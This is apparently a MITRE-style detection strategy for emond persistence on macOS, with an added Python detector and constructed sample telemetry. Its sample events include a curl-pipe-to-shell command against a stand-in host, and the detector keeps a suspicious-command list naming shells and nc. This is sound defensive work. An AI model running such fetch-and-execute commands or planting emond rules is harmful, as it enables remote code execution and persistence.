
DET0555 Detection Strategy for Event Triggered Execution via emond on macOS

Item Value
ID DET0555
Version 1.0
Created 21 October 2025
Last Modified 21 October 2025

Technique Detected: T1546.014 (Emond)

Analytics

macOS

AN1534

Detection focuses on unauthorized file creation or modification under /etc/emond.d/rules/ (where emond rule plists live) or /private/var/db/emondClients (the QueueDirectories path in com.apple.emond.plist; a file appearing there causes launchd to start emond), either of which indicates an attempt to register and trigger a malicious emond rule. Correlate those writes with execution of /sbin/emond and with the child processes it spawns, particularly around boot or login, when rules fire. Anomalies include rule files written by non-root processes, rule files added outside a known deployment or update window, and emond spawning shells, interpreters or network clients.

Log Sources
Data Component Name Channel
File Creation (DC0039) macos:unifiedlog file create or modify in /etc/emond.d/rules or /private/var/db/emondClients
Process Creation (DC0032) macos:unifiedlog execution of /sbin/emond with child processes launched
File Modification (DC0061) macos:unifiedlog rule definitions written to emond rule plists
Command Execution (DC0064) macos:unifiedlog command execution triggered by emond (e.g., shell, curl, python)

Mutable Elements
Field Description
PathPrefix Paths such as /etc/emond.d/rules/ and /private/var/db/emondClients may appear in equivalent forms (on macOS /etc is a symlink to /private/etc, so /private/etc/emond.d/rules/ is the same directory) or be relocated in some setups
TimeWindow The time range for correlating rule file creation to emond execution may be tuned based on system performance and usage
ParentProcessFilter Defenders may wish to restrict alerts to emond processes not spawned from trusted system update or provisioning tools
CommandPatternList List of known suspicious commands or binaries used by adversaries (e.g., reverse shells, persistence scripts)
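The correlation described in the analytic above, with the four mutable elements exposed as tunables, written out as an added worked example; this is not MITRE's code and not part of the original page. It runs over constructed, already-normalized events; the Event fields, the trusted-parent allow-list and the command list are assumptions standing in for whatever the EDR or unified-log pipeline emits.

```python
"""Correlate emond rule-file writes with /sbin/emond execution and the commands
emond spawns. Added example for AN1534; event schema and tunable values are
assumptions, not a real log format."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from os.path import basename

# Tunables mirroring the strategy's mutable elements (values are assumptions).
PATH_PREFIXES = ("/etc/emond.d/rules/", "/private/etc/emond.d/rules/",
                 "/private/var/db/emondClients/")          # PathPrefix
TIME_WINDOW = timedelta(minutes=10)                         # TimeWindow
TRUSTED_PARENTS = {"/usr/sbin/installer", "/usr/libexec/mdmclient"}  # ParentProcessFilter (hypothetical)
COMMAND_PATTERNS = {"sh", "bash", "zsh", "curl", "python3", "osascript", "nc"}  # CommandPatternList
EMOND = "/sbin/emond"


@dataclass
class Event:
    ts: datetime
    kind: str              # "file_create", "file_modify" or "process_exec"
    uid: int = 0
    pid: int = 0
    ppid: int = 0
    path: str = ""         # file events: path written
    exe: str = ""          # process events: executable path
    parent_exe: str = ""   # process events: parent executable path
    cmdline: str = ""


def is_emond_path(path):
    return path.startswith(PATH_PREFIXES)


def detect(events):
    """Return a list of alert dicts; each has a 'rule' key naming what fired."""
    alerts = []
    events = sorted(events, key=lambda e: e.ts)

    # 1. Any write into the emond rule or client directories is itself notable;
    #    a non-root writer is flagged separately (the directories are root-owned).
    rule_writes = [e for e in events
                   if e.kind in ("file_create", "file_modify") and is_emond_path(e.path)]
    for w in rule_writes:
        alerts.append({"rule": "emond_rule_write", "path": w.path,
                       "uid": w.uid, "non_root": w.uid != 0, "ts": w.ts})

    # 2. emond executions, minus those started by allow-listed provisioning tools.
    emond_execs = {e.pid: e for e in events
                   if e.kind == "process_exec" and e.exe == EMOND
                   and e.parent_exe not in TRUSTED_PARENTS}

    # 3. A rule write followed by emond starting within TIME_WINDOW.
    for pid, em in emond_execs.items():
        preceding = [w for w in rule_writes
                     if timedelta(0) <= em.ts - w.ts <= TIME_WINDOW]
        if preceding:
            alerts.append({"rule": "rule_write_then_emond", "emond_pid": pid,
                           "writes": [w.path for w in preceding]})

    # 4. Suspicious commands anywhere in an emond process tree (not only direct
    #    children, so "sh -c 'curl ...'" catches both sh and curl).
    parent_of = {e.pid: e.ppid for e in events if e.kind == "process_exec"}

    def emond_ancestor(pid):
        seen = set()
        while pid in parent_of and pid not in seen:
            seen.add(pid)
            pid = parent_of[pid]
            if pid in emond_execs:
                return pid
        return None

    for e in events:
        if e.kind != "process_exec" or e.exe == EMOND:
            continue
        anc = emond_ancestor(e.pid)
        if anc is not None and basename(e.exe) in COMMAND_PATTERNS:
            alerts.append({"rule": "emond_spawned_command", "exe": e.exe,
                           "cmdline": e.cmdline, "emond_pid": anc})
    return alerts


def sample_events():
    """Constructed sample telemetry (not real logs) exercising each branch."""
    t0 = datetime(2025, 10, 21, 9, 0, 0)
    s = lambda n: t0 + timedelta(seconds=n)
    return [
        # Non-root process drops a rule plist and a trigger file into emondClients
        Event(s(0), "file_create", uid=501, pid=777, path="/etc/emond.d/rules/update.plist"),
        Event(s(1), "file_create", uid=501, pid=777, path="/private/var/db/emondClients/trigger"),
        # launchd starts emond, which runs the rule's command via a shell
        Event(s(5), "process_exec", uid=0, pid=800, ppid=1, exe=EMOND, parent_exe="/sbin/launchd"),
        Event(s(6), "process_exec", uid=0, pid=801, ppid=800, exe="/bin/sh", parent_exe=EMOND,
              cmdline="/bin/sh -c 'curl -s http://example.invalid/p | sh'"),
        Event(s(6), "process_exec", uid=0, pid=802, ppid=801, exe="/usr/bin/curl", parent_exe="/bin/sh",
              cmdline="curl -s http://example.invalid/p"),
        # Benign noise: unrelated plist edit, user-launched interpreter
        Event(s(3600), "file_modify", uid=0, pid=300, path="/Library/Preferences/com.example.plist"),
        Event(s(7200), "process_exec", uid=501, pid=900, ppid=1, exe="/usr/bin/python3",
              parent_exe="/sbin/launchd", cmdline="python3 script.py"),
        # emond started by an allow-listed tool: suppressed by ParentProcessFilter
        Event(s(10800), "process_exec", uid=0, pid=950, ppid=940, exe=EMOND, parent_exe="/usr/libexec/mdmclient"),
        Event(s(10801), "process_exec", uid=0, pid=951, ppid=950, exe="/bin/sh", parent_exe=EMOND,
              cmdline="/bin/sh -c true"),
    ]


if __name__ == "__main__":
    for alert in detect(sample_events()):
        print(alert)
```

On the sample input the detector raises two emond_rule_write alerts (both marked non-root), one rule_write_then_emond correlation for pid 800, and two emond_spawned_command alerts (sh and curl); the mdmclient-launched emond and its shell are suppressed. Widening TIME_WINDOW trades a few false correlations for catching rules that are planted long before the next login fires them.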